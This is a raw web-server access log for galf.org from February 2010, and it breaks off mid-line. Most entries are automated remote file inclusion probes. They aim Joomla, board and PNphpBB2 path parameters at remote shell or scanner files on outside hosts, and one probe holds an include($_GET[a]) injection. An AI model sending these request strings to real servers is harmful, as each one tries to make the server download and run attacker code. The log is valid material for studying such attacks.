79.170.45.126 - - [01/Feb/2010:05:06:18 -0800] "GET /logs/access_090803.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:06:23 -0800] "GET /errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:06:23 -0800] "GET /logs/errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:06:23 -0800] "GET /errors.php?error=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:06:23 -0800] "GET /logs/errors.php?error=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:06:27 -0800] "GET /logs/access_090824.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:06:47 -0800] "GET /logs/access_090831.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:14:58 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:15:16 -0800] "GET /logs/access_090720.log////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.81 - - [01/Feb/2010:05:16:03 -0800] "GET /logs/access_090706.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
65.55.106.229 - - [01/Feb/2010:05:17:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:17:46 -0800] "GET /logs/access_090907.log////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:17:46 -0800] "GET /logs/access_091102.log////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:05:18:48 -0800] "GET /logs/access_091228.log HTTP/1.0" 200 6435147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:19:07 -0800] "GET /logs/access.log//bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:19:07 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:19:07 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:19:19 -0800] "GET /logs/access_090907.log////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:19:28 -0800] "GET /logs/access_091102.log////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:19:57 -0800] "GET /logs/access_100125.log//bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.185.138.49 - - [01/Feb/2010:05:20:11 -0800] "GET /logs/access_090713.log HTTP/1.1" 301 - "http://www.bing.com/search?q=ip%3A216.39.57.104+upload.php&go=&form=QBRE&filt=all" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5" "www.galf.org"
78.185.138.49 - - [01/Feb/2010:05:20:12 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:14 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:14 -0800] "GET /delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:14 -0800] "GET /logs//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:14 -0800] "GET /delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:14 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:14 -0800] "GET /logs//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:24 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:20:31 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:21:02 -0800] "GET /logs/access_100118.log%20%20//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:21:07 -0800] "GET /logs/access_100118.log%20%20//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:21:51 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:21:51 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:21:51 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:22:36 -0800] "GET /logs/access_100125.log//bbs/write_comment_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:23:08 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:23:10 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:23:10 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:23:12 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://sisi123.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:05:24:35 -0800] "GET /logs/access_090720.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:05:24:35 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:05:24:35 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:25:44 -0800] "GET /logs/access.log//bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:25:44 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:25:44 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Feb/2010:05:26:18 -0800] "GET /logs/access_100125.log//bbs/kr_shop.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:27:12 -0800] "GET /logs/access_090720.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:27:12 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:27:12 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.155 - - [01/Feb/2010:05:28:31 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [01/Feb/2010:05:28:31 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.158.155 - - [01/Feb/2010:05:28:31 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.106.229 - - [01/Feb/2010:05:31:36 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 65536 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:05:32:01 -0800] "GET /logs/access_090720.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:05:32:01 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:05:32:01 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.202.168.81 - - [01/Feb/2010:05:32:21 -0800] "GET /logs/access_090629.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:32:58 -0800] "GET /logs/access_090720.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:32:58 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:32:58 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.185.138.49 - - [01/Feb/2010:05:33:57 -0800] "GET /logs/access_091228.log HTTP/1.1" 200 3211264 "http://www.bing.com/search?q=ip%3A216.39.57.104+upload.php&go=&form=QBRE&filt=all" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5" "www.galf.org"
78.185.138.49 - - [01/Feb/2010:05:34:12 -0800] "GET /logs/access_091228.log HTTP/1.1" 206 786432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5" "www.galf.org"
78.185.138.49 - - [01/Feb/2010:05:34:12 -0800] "GET /logs/access_091228.log HTTP/1.1" 206 786432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:35:12 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:35:12 -0800] "GET /logs/access.log%20%20/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:35:12 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:36:47 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.150.132.139 - - [01/Feb/2010:05:36:47 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [01/Feb/2010:05:37:31 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMEN_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:37:31 -0800] "GET /logs///?_SERVER[DOCUMEN_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [01/Feb/2010:05:37:31 -0800] "GET //?_SERVER[DOCUMEN_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:37:32 -0800] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.150.132.139 - - [01/Feb/2010:05:38:00 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:38:00 -0800] "GET /logs/access_090803.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:05:38:00 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:13 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:14 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ferienwohnungtisno.com/scan?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:14 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:15 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://ferienwohnungtisno.com/scan?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:31 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:31 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:32 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
118.82.114.113 - - [01/Feb/2010:05:39:32 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
84.19.168.8 - - [01/Feb/2010:05:39:40 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [01/Feb/2010:05:39:40 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [01/Feb/2010:05:39:40 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.202.168.81 - - [01/Feb/2010:05:44:54 -0800] "GET /logs/access_090622.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:05:49:11 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:05:49:11 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:05:49:11 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:05:49:50 -0800] "GET /cendoc/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:05:51:24 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:05:51:24 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [01/Feb/2010:05:51:25 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:52:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:52:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:52:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:52:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
222.237.78.123 - - [01/Feb/2010:05:53:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.123 - - [01/Feb/2010:05:53:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.123 - - [01/Feb/2010:05:53:56 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.23.213.200 - - [01/Feb/2010:05:54:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:54:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:54:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
94.23.213.200 - - [01/Feb/2010:05:54:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
222.237.78.123 - - [01/Feb/2010:05